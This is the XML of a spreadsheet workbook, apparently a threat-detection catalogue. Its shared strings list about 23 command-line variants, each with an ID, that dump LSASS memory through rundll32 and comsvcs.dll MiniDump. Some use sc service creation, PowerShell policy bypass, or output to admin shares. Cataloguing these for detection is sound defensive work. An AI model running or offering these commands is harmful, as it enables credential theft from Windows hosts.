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5B0ED24D-EB07-EE41-9C7D-BA954792D7D6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293" r:id="rId12"/>
    <pivotCache cacheId="294" r:id="rId13"/>
    <pivotCache cacheId="295" r:id="rId14"/>
    <pivotCache cacheId="29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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="158" uniqueCount="90">
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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type</t>
  </si>
  <si>
    <t>initiating_file_name</t>
  </si>
  <si>
    <t>service_name</t>
  </si>
  <si>
    <t>start_type</t>
  </si>
  <si>
    <t>service_file_name</t>
  </si>
  <si>
    <t>initiating_process_name_parent</t>
  </si>
  <si>
    <t>service_account</t>
  </si>
  <si>
    <t>initiating_file_path</t>
  </si>
  <si>
    <t>(blank)</t>
  </si>
  <si>
    <t>C:\Windows\System32\rundll32.exe"  C:\Windows\System32\comsvcs.dll MiniDump &lt;PID&gt; \Windows\Temp\&lt;filename&gt;.dmp full</t>
  </si>
  <si>
    <t xml:space="preserve">.\rundll32.exe  C:\windows\System32\comsvcs.dll, MiniDump &lt;PID&gt; C:\Users\Administrator\&lt;filename&gt;.dmp full </t>
  </si>
  <si>
    <t>C:\Windows\system32\sc.exe" \\server create Dump binpath= "C:\Windows\System32\rundll32.exe C:\Windows\System32\comsvcs.dll,MiniDump &lt;PID&gt; C:\dump.bin full"</t>
  </si>
  <si>
    <t>C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -c rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump &lt;PID&gt; C:\Users\username\Desktop\&lt;filename&gt;.DMP full</t>
  </si>
  <si>
    <t>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" &amp; {C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump &lt;PID&gt;Get-Process lsass).id $env:TEMP\lsass-&lt;filename&gt;.dmp full}</t>
  </si>
  <si>
    <t>Powershell" -c "rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump &lt;PID&gt;get-process lsass).id C:\Users\username\AppData\Local\Temp\&lt;filename&gt;.dmp full"</t>
  </si>
  <si>
    <t>C:\Windows\system32\cmd.exe /c "echo string &gt;NUL &amp; powershell -ExecutionPolicy bypass -Command "$a = (Get-Process lsass).id; rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump &lt;PID&gt;a C:\Windows\TEMP\string\string\&lt;filename&gt;.dmp full" &amp; exit"</t>
  </si>
  <si>
    <t>C:\Windows\system32\cmd.exe /Q /c echo .\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump &lt;PID&gt; C:\Users\Administrator\&lt;filename&gt;.dmp full ^&gt; \\127.0.0.1\C$\__output 2^&gt;^&amp;1 &gt; C:\Windows\TEMP\execute.bat &amp; C:\Windows\system32\cmd.exe /Q /c C:\Windows\TEMP\execute.bat &amp; del C:\Windows\TEMP\execute.bat</t>
  </si>
  <si>
    <t>C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.EXE "rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump &lt;PID&gt;get-process lsass).id) C:\Windows\lsass_$(Get-Date -Format dd-MM-hh-mm-ss&lt;filename&gt;dmp full"</t>
  </si>
  <si>
    <t xml:space="preserve">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoP -C C:\Windows\System32\rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump &lt;PID&gt;Get-Process lsass).Id \Windows\Temp\&lt;filename&gt;.dmp </t>
  </si>
  <si>
    <t>cmd /C "rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump &lt;PID&gt; \\ipv4\pwn\&lt;filename&gt;.dmp full"</t>
  </si>
  <si>
    <t>cmd.exe  /Q /c for /f "tokens=1,2 delims= " %A in ('"tasklist /fi "Imagename eq lsass.exe" | find "lsass""') do C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump &lt;PID&gt; \Windows\Temp\&lt;filename&gt;.dmp full</t>
  </si>
  <si>
    <t>cmd.exe /Q /c for /f "tokens=1,2 delims= " ^%A in ('"tasklist /fi "Imagename eq lsass.exe" | find "lsass""') do rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump &lt;PID&gt; \Windows\Temp\&lt;filename&gt;.dmp full</t>
  </si>
  <si>
    <t>cmd.exe /C cmd.exe /Q /c for /f "tokens=1,2 delims= " ^%A in ('"tasklist /fi "Imagename eq lsass.exe" | find "lsass""') do C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump &lt;PID&gt; \Windows\Temp\&lt;filename&gt;.dmp full</t>
  </si>
  <si>
    <t>cmd.exe /C powershell.exe -NoP -C "C:\Windows\System32\rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump &lt;PID&gt;Get-Process lsass).Id \Windows\Temp\&lt;filename&gt;.dmp full;Wait-Process -Id (Get-Process rundll32).id"</t>
  </si>
  <si>
    <t>cmd.exe /Q /c powershell -noni -nop "rundll32.exe comsvcs.dll,minidump &lt;PID&gt; c:\windows\temp\test.log full" 1&gt; \\127.0.0.1\ADMIN$\__1111111.1111111 2&gt;&amp;1</t>
  </si>
  <si>
    <t>cmd.exe /Q /c rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump &lt;PID&gt; C:\&lt;filename&gt;.dmp full 1&gt; \\127.0.0.1\ADMIN$\__1111111.1111111 2&gt;&amp;1</t>
  </si>
  <si>
    <t>powershell  -ExecutionPolicy bypass -Command "$a = (Get-Process lsass).id; rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump &lt;PID&gt;a C:\temp\blabla"</t>
  </si>
  <si>
    <t>powershell  -noni -nop "rundll32.exe comsvcs.dll,minidump &lt;PID&gt; c:\windows\temp\test.log full"</t>
  </si>
  <si>
    <t>powershell.exe -ExecutionPolicy Bypass -C "C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump &lt;PID&gt;Get-Process lsass).id $env:TEMP\lsass-&lt;filename&gt;.dmp full"</t>
  </si>
  <si>
    <t>cmd.exe /Q /c sc create DumpProc binpath= "rundll32 comsvcs,#24 1204 c:\windows\tmp1654.log full" 1&gt; \\127.0.0.1\ADMIN$\__1622704760.494238 2&gt;&amp;1</t>
  </si>
  <si>
    <t>rundll32.exe  comsvcs.dll,#24 600 C:\Users\user\Desktop\lsass.dmp full</t>
  </si>
  <si>
    <t>sc  create DumpProc binpath= "rundll32 comsvcs,#24 1204 c:\windows\tmp.log full"</t>
  </si>
  <si>
    <t>{"date": "2021-06-23" , "url": "https://gist.github.com/JohnLaTwC/3e7dd4cd8520467df179e93fb44a434e"}</t>
  </si>
  <si>
    <t>lolwin-eid0001</t>
  </si>
  <si>
    <t>lolwin-eid0002</t>
  </si>
  <si>
    <t>lolwin-eid0003</t>
  </si>
  <si>
    <t>lolwin-eid0004</t>
  </si>
  <si>
    <t>lolwin-eid0005</t>
  </si>
  <si>
    <t>lolwin-eid0006</t>
  </si>
  <si>
    <t>lolwin-eid0007</t>
  </si>
  <si>
    <t>lolwin-eid0008</t>
  </si>
  <si>
    <t>lolwin-eid0009</t>
  </si>
  <si>
    <t>lolwin-eid0010</t>
  </si>
  <si>
    <t>lolwin-eid0011</t>
  </si>
  <si>
    <t>lolwin-eid0012</t>
  </si>
  <si>
    <t>lolwin-eid0013</t>
  </si>
  <si>
    <t>lolwin-eid0014</t>
  </si>
  <si>
    <t>lolwin-eid0015</t>
  </si>
  <si>
    <t>lolwin-eid0016</t>
  </si>
  <si>
    <t>lolwin-eid0017</t>
  </si>
  <si>
    <t>lolwin-eid0018</t>
  </si>
  <si>
    <t>lolwin-eid0019</t>
  </si>
  <si>
    <t>lolwin-eid0020</t>
  </si>
  <si>
    <t>lolwin-eid0021</t>
  </si>
  <si>
    <t>lolwin-eid0022</t>
  </si>
  <si>
    <t>lolwin-eid0023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</si>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</sst>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166663" createdVersion="8" refreshedVersion="8" minRefreshableVersion="3" recordCount="1" xr:uid="{18FB9807-E196-9540-BE4B-38DD33FA94D8}">
  <cacheSource type="worksheet">
    <worksheetSource name="Table5"/>
  </cacheSource>
  <cacheFields count="8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htool" numFmtId="0">
      <sharedItems containsNonDate="0" containsString="0" containsBlank="1"/>
    </cacheField>
    <cacheField name="hscript" numFmtId="0">
      <sharedItems containsNonDate="0" containsString="0" containsBlank="1"/>
    </cacheField>
    <cacheField name="c2" numFmtId="0">
      <sharedItems containsNonDate="0" containsString="0" containsBlank="1"/>
    </cacheField>
    <cacheField name="evidence" numFmtId="0">
      <sharedItems containsNonDate="0" containsString="0" containsBlank="1"/>
    </cacheField>
    <cacheField name="ns_meta" numFmtId="0">
      <sharedItems containsNonDate="0" containsBlank="1" count="19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282409" createdVersion="8" refreshedVersion="8" minRefreshableVersion="3" recordCount="1" xr:uid="{5CA93B16-8AF6-1046-BA3C-1426CD47B8CD}">
  <cacheSource type="worksheet">
    <worksheetSource name="Table4"/>
  </cacheSource>
  <cacheFields count="10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file_action" numFmtId="0">
      <sharedItems containsNonDate="0" containsString="0" containsBlank="1"/>
    </cacheField>
    <cacheField name="file_path" numFmtId="0">
      <sharedItems containsNonDate="0" containsString="0" containsBlank="1"/>
    </cacheField>
    <cacheField name="file_name" numFmtId="0">
      <sharedItems containsNonDate="0" containsString="0" containsBlank="1"/>
    </cacheField>
    <cacheField name="initiating_file_name" numFmtId="0">
      <sharedItems containsNonDate="0" containsString="0" containsBlank="1"/>
    </cacheField>
    <cacheField name="initiating_file_path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ns_meta" numFmtId="0">
      <sharedItems containsNonDate="0" containsBlank="1" count="10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2DA1FF8F-64C6-3E47-98A5-D101103E385C}">
  <cacheSource type="worksheet">
    <worksheetSource name="Table3"/>
  </cacheSource>
  <cacheFields count="11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NonDate="0" containsString="0" containsBlank="1"/>
    </cacheField>
    <cacheField name="src_process_path" numFmtId="0">
      <sharedItems containsNonDate="0" containsString="0" containsBlank="1"/>
    </cacheField>
    <cacheField name="tgt_process" numFmtId="0">
      <sharedItems containsNonDate="0" containsString="0" containsBlank="1"/>
    </cacheField>
    <cacheField name="tgt_process_path" numFmtId="0">
      <sharedItems containsNonDate="0" containsString="0" containsBlank="1"/>
    </cacheField>
    <cacheField name="access" numFmtId="0">
      <sharedItems containsNonDate="0" containsString="0" containsBlank="1"/>
    </cacheField>
    <cacheField name="trac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7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FF071065-5305-A843-BC0E-8956AD2AA9CE}">
  <cacheSource type="worksheet">
    <worksheetSource name="Table1"/>
  </cacheSource>
  <cacheFields count="12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cess_cmdline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process_name" numFmtId="0">
      <sharedItems containsNonDate="0" containsString="0" containsBlank="1"/>
    </cacheField>
    <cacheField name="initiating_process_name" numFmtId="0">
      <sharedItems containsNonDate="0" containsString="0" containsBlank="1"/>
    </cacheField>
    <cacheField name="process_path" numFmtId="0">
      <sharedItems containsNonDate="0" containsString="0" containsBlank="1"/>
    </cacheField>
    <cacheField name="initiating_process_path" numFmtId="0">
      <sharedItems containsNonDate="0" containsString="0"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19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2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m="1" x="18"/>
        <item t="default"/>
      </items>
    </pivotField>
  </pivotFields>
  <rowFields count="1">
    <field x="11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2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</pivotFields>
  <rowFields count="1">
    <field x="10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2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</pivotFields>
  <rowFields count="1">
    <field x="9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2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t="default"/>
      </items>
    </pivotField>
  </pivotFields>
  <rowFields count="1">
    <field x="7"/>
  </rowFields>
  <rowItems count="2"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24" totalsRowShown="0" headerRowDxfId="19">
  <autoFilter ref="A1:L24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process_cmdline" dataDxfId="18"/>
    <tableColumn id="7" xr3:uid="{BBA3C39C-E28D-CE4E-8522-1B64FD909BC1}" name="initiating_process_cmdline" dataDxfId="17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6"/>
    <tableColumn id="12" xr3:uid="{B696AE98-F833-4348-8A2A-083681C93892}" name="account"/>
    <tableColumn id="13" xr3:uid="{DEC979B5-A396-F945-A221-01278C4EA968}" name="object"/>
    <tableColumn id="14" xr3:uid="{768D574A-4DC6-E84B-8CD2-121E544083BD}" name="ns_meta" dataDxfId="1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4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3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2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1"/>
    <tableColumn id="4" xr3:uid="{593E9916-B818-E948-9CB0-FF14679B05EF}" name="file_action"/>
    <tableColumn id="5" xr3:uid="{130E5943-D692-AB4C-A424-2D854D4233D6}" name="file_path" dataDxfId="10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9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8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7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6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5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2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24"/>
  <sheetViews>
    <sheetView tabSelected="1" topLeftCell="D1" workbookViewId="0">
      <pane ySplit="1" topLeftCell="A2" activePane="bottomLeft" state="frozen"/>
      <selection pane="bottomLeft" activeCell="J2" sqref="J2"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultRowHeight="16" x14ac:dyDescent="0.2"/>
  <cols>
    <col min="1" max="1" width="13" bestFit="1" customWidth="1"/>
    <col min="2" max="2" width="11" customWidth="1"/>
    <col min="3" max="3" width="30.1640625" customWidth="1"/>
    <col min="4" max="4" width="105.6640625" style="1" customWidth="1"/>
    <col min="5" max="5" width="90" customWidth="1"/>
    <col min="6" max="6" width="15.83203125" customWidth="1"/>
    <col min="7" max="7" width="24.5" customWidth="1"/>
    <col min="8" max="8" width="29.1640625" bestFit="1" customWidth="1"/>
    <col min="9" max="9" width="23.1640625" style="1" bestFit="1" customWidth="1"/>
    <col min="10" max="10" width="21.83203125" customWidth="1"/>
    <col min="11" max="11" width="42.33203125" customWidth="1"/>
    <col min="12" max="12" width="87.5" style="1" bestFit="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:12" ht="17" x14ac:dyDescent="0.2">
      <c r="A1" s="4" t="s">
        <v>6</v>
      </c>
      <c r="B1" s="4" t="s">
        <v>0</v>
      </c>
      <c r="C1" s="4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16</v>
      </c>
      <c r="I1" s="5" t="s">
        <v>17</v>
      </c>
      <c r="J1" s="4" t="s">
        <v>89</v>
      </c>
      <c r="K1" s="4" t="s">
        <v>31</v>
      </c>
      <c r="L1" s="5" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="2" spans="1:12" ht="34" x14ac:dyDescent="0.2">
      <c r="A2" s="1" t="s">
        <v>66</v>
      </c>
      <c r="D2" s="1" t="s">
        <v>42</v>
      </c>
      <c r="E2" s="1"/>
      <c r="L2" s="1" t="s">
        <v>65</v>
      </c>
    </row>
    <row r="3" spans="1:12" ht="34" x14ac:dyDescent="0.2">
      <c r="A3" s="1" t="s">
        <v>67</v>
      </c>
      <c r="D3" s="1" t="s">
        <v>43</v>
      </c>
      <c r="E3" s="1"/>
      <c r="L3" s="1" t="s">
        <v>65</v>
      </c>
    </row>
    <row r="4" spans="1:12" ht="34" x14ac:dyDescent="0.2">
      <c r="A4" s="1" t="s">
        <v>68</v>
      </c>
      <c r="D4" s="1" t="s">
        <v>44</v>
      </c>
      <c r="E4" s="1"/>
      <c r="L4" s="1" t="s">
        <v>65</v>
      </c>
    </row>
    <row r="5" spans="1:12" ht="34" x14ac:dyDescent="0.2">
      <c r="A5" s="1" t="s">
        <v>69</v>
      </c>
      <c r="D5" s="1" t="s">
        <v>45</v>
      </c>
      <c r="E5" s="1"/>
      <c r="L5" s="1" t="s">
        <v>65</v>
      </c>
    </row>
    <row r="6" spans="1:12" ht="34" x14ac:dyDescent="0.2">
      <c r="A6" s="1" t="s">
        <v>70</v>
      </c>
      <c r="D6" s="1" t="s">
        <v>46</v>
      </c>
      <c r="E6" s="1"/>
      <c r="L6" s="1" t="s">
        <v>65</v>
      </c>
    </row>
    <row r="7" spans="1:12" ht="34" x14ac:dyDescent="0.2">
      <c r="A7" s="1" t="s">
        <v>71</v>
      </c>
      <c r="D7" s="1" t="s">
        <v>47</v>
      </c>
      <c r="E7" s="1"/>
      <c r="L7" s="1" t="s">
        <v>65</v>
      </c>
    </row>
    <row r="8" spans="1:12" ht="51" x14ac:dyDescent="0.2">
      <c r="A8" s="1" t="s">
        <v>72</v>
      </c>
      <c r="D8" s="1" t="s">
        <v>48</v>
      </c>
      <c r="E8" s="1"/>
      <c r="L8" s="1" t="s">
        <v>65</v>
      </c>
    </row>
    <row r="9" spans="1:12" ht="51" x14ac:dyDescent="0.2">
      <c r="A9" s="1" t="s">
        <v>73</v>
      </c>
      <c r="D9" s="1" t="s">
        <v>49</v>
      </c>
      <c r="E9" s="1"/>
      <c r="L9" s="1" t="s">
        <v>65</v>
      </c>
    </row>
    <row r="10" spans="1:12" ht="34" x14ac:dyDescent="0.2">
      <c r="A10" s="1" t="s">
        <v>74</v>
      </c>
      <c r="D10" s="1" t="s">
        <v>50</v>
      </c>
      <c r="E10" s="1"/>
      <c r="L10" s="1" t="s">
        <v>65</v>
      </c>
    </row>
    <row r="11" spans="1:12" ht="34" x14ac:dyDescent="0.2">
      <c r="A11" s="1" t="s">
        <v>75</v>
      </c>
      <c r="D11" s="1" t="s">
        <v>51</v>
      </c>
      <c r="E11" s="1"/>
      <c r="L11" s="1" t="s">
        <v>65</v>
      </c>
    </row>
    <row r="12" spans="1:12" ht="34" x14ac:dyDescent="0.2">
      <c r="A12" s="1" t="s">
        <v>76</v>
      </c>
      <c r="D12" s="1" t="s">
        <v>52</v>
      </c>
      <c r="E12" s="1"/>
      <c r="L12" s="1" t="s">
        <v>65</v>
      </c>
    </row>
    <row r="13" spans="1:12" ht="51" x14ac:dyDescent="0.2">
      <c r="A13" s="1" t="s">
        <v>77</v>
      </c>
      <c r="D13" s="1" t="s">
        <v>53</v>
      </c>
      <c r="E13" s="1"/>
      <c r="L13" s="1" t="s">
        <v>65</v>
      </c>
    </row>
    <row r="14" spans="1:12" ht="34" x14ac:dyDescent="0.2">
      <c r="A14" s="1" t="s">
        <v>78</v>
      </c>
      <c r="D14" s="1" t="s">
        <v>54</v>
      </c>
      <c r="E14" s="1"/>
      <c r="L14" s="1" t="s">
        <v>65</v>
      </c>
    </row>
    <row r="15" spans="1:12" ht="51" x14ac:dyDescent="0.2">
      <c r="A15" s="1" t="s">
        <v>79</v>
      </c>
      <c r="D15" s="1" t="s">
        <v>55</v>
      </c>
      <c r="E15" s="1"/>
      <c r="L15" s="1" t="s">
        <v>65</v>
      </c>
    </row>
    <row r="16" spans="1:12" ht="34" x14ac:dyDescent="0.2">
      <c r="A16" s="1" t="s">
        <v>80</v>
      </c>
      <c r="D16" s="1" t="s">
        <v>56</v>
      </c>
      <c r="E16" s="1"/>
      <c r="L16" s="1" t="s">
        <v>65</v>
      </c>
    </row>
    <row r="17" spans="1:12" ht="34" x14ac:dyDescent="0.2">
      <c r="A17" s="1" t="s">
        <v>81</v>
      </c>
      <c r="D17" s="1" t="s">
        <v>57</v>
      </c>
      <c r="E17" s="1"/>
      <c r="L17" s="1" t="s">
        <v>65</v>
      </c>
    </row>
    <row r="18" spans="1:12" ht="34" x14ac:dyDescent="0.2">
      <c r="A18" s="1" t="s">
        <v>82</v>
      </c>
      <c r="D18" s="1" t="s">
        <v>58</v>
      </c>
      <c r="E18" s="1"/>
      <c r="L18" s="1" t="s">
        <v>65</v>
      </c>
    </row>
    <row r="19" spans="1:12" ht="34" x14ac:dyDescent="0.2">
      <c r="A19" s="1" t="s">
        <v>83</v>
      </c>
      <c r="D19" s="1" t="s">
        <v>59</v>
      </c>
      <c r="E19" s="1"/>
      <c r="L19" s="1" t="s">
        <v>65</v>
      </c>
    </row>
    <row r="20" spans="1:12" ht="34" x14ac:dyDescent="0.2">
      <c r="A20" s="1" t="s">
        <v>84</v>
      </c>
      <c r="D20" s="1" t="s">
        <v>60</v>
      </c>
      <c r="E20" s="1"/>
      <c r="L20" s="1" t="s">
        <v>65</v>
      </c>
    </row>
    <row r="21" spans="1:12" ht="34" x14ac:dyDescent="0.2">
      <c r="A21" s="1" t="s">
        <v>85</v>
      </c>
      <c r="D21" s="14" t="s">
        <v>61</v>
      </c>
      <c r="E21" s="1"/>
      <c r="L21" s="1" t="s">
        <v>65</v>
      </c>
    </row>
    <row r="22" spans="1:12" ht="34" x14ac:dyDescent="0.2">
      <c r="A22" s="1" t="s">
        <v>86</v>
      </c>
      <c r="D22" s="1" t="s">
        <v>62</v>
      </c>
      <c r="E22" s="1"/>
      <c r="L22" s="1" t="s">
        <v>65</v>
      </c>
    </row>
    <row r="23" spans="1:12" ht="34" x14ac:dyDescent="0.2">
      <c r="A23" s="1" t="s">
        <v>87</v>
      </c>
      <c r="D23" s="14" t="s">
        <v>63</v>
      </c>
      <c r="E23" s="1"/>
      <c r="L23" s="1" t="s">
        <v>65</v>
      </c>
    </row>
    <row r="24" spans="1:12" ht="34" x14ac:dyDescent="0.2">
      <c r="A24" s="1" t="s">
        <v>88</v>
      </c>
      <c r="D24" s="1" t="s">
        <v>64</v>
      </c>
      <c r="E24" s="1"/>
      <c r="L24" s="1" t="s">
        <v>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5"/>
  <sheetViews>
    <sheetView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5"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="A14" sqref="A14:A15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workbookViewId="0">
      <pane ySplit="1" topLeftCell="A2" activePane="bottomLeft" state="frozen"/>
      <selection pane="bottomLeft" activeCell="H20" sqref="H20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15</v>
      </c>
      <c r="E1" s="8" t="s">
        <v>18</v>
      </c>
      <c r="F1" s="8" t="s">
        <v>19</v>
      </c>
      <c r="G1" s="8" t="s">
        <v>34</v>
      </c>
      <c r="H1" s="13" t="s">
        <v>40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2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23</v>
      </c>
      <c r="E1" s="7" t="s">
        <v>24</v>
      </c>
      <c r="F1" s="7" t="s">
        <v>32</v>
      </c>
      <c r="G1" s="7" t="s">
        <v>22</v>
      </c>
      <c r="H1" s="7" t="s">
        <v>5</v>
      </c>
      <c r="I1" s="7" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="2" spans="1:9" ht="17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37</v>
      </c>
      <c r="E1" s="11" t="s">
        <v>39</v>
      </c>
      <c r="F1" s="11" t="s">
        <v>35</v>
      </c>
      <c r="G1" s="11" t="s">
        <v>36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33</v>
      </c>
      <c r="E1" s="4" t="s">
        <v>1</v>
      </c>
      <c r="F1" s="5" t="s">
        <v>2</v>
      </c>
      <c r="G1" s="4" t="s">
        <v>4</v>
      </c>
      <c r="H1" s="4" t="s">
        <v>38</v>
      </c>
      <c r="I1" s="5" t="s">
        <v>31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1"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <pane ySplit="1" topLeftCell="A2" activePane="bottomLeft" state="frozen"/>
      <selection activeCell="C1" sqref="C1"/>
      <selection pane="bottomLeft" activeCell="G10" sqref="G10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13</v>
      </c>
      <c r="E1" s="9" t="s">
        <v>14</v>
      </c>
      <c r="F1" s="9" t="s">
        <v>20</v>
      </c>
      <c r="G1" s="10" t="s">
        <v>21</v>
      </c>
      <c r="H1" s="9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5"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="A4" sqref="A4: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5"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="A20" sqref="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2025-05-06T12:47:56Z</dcterms:modified>
</cp:coreProperties>
</file>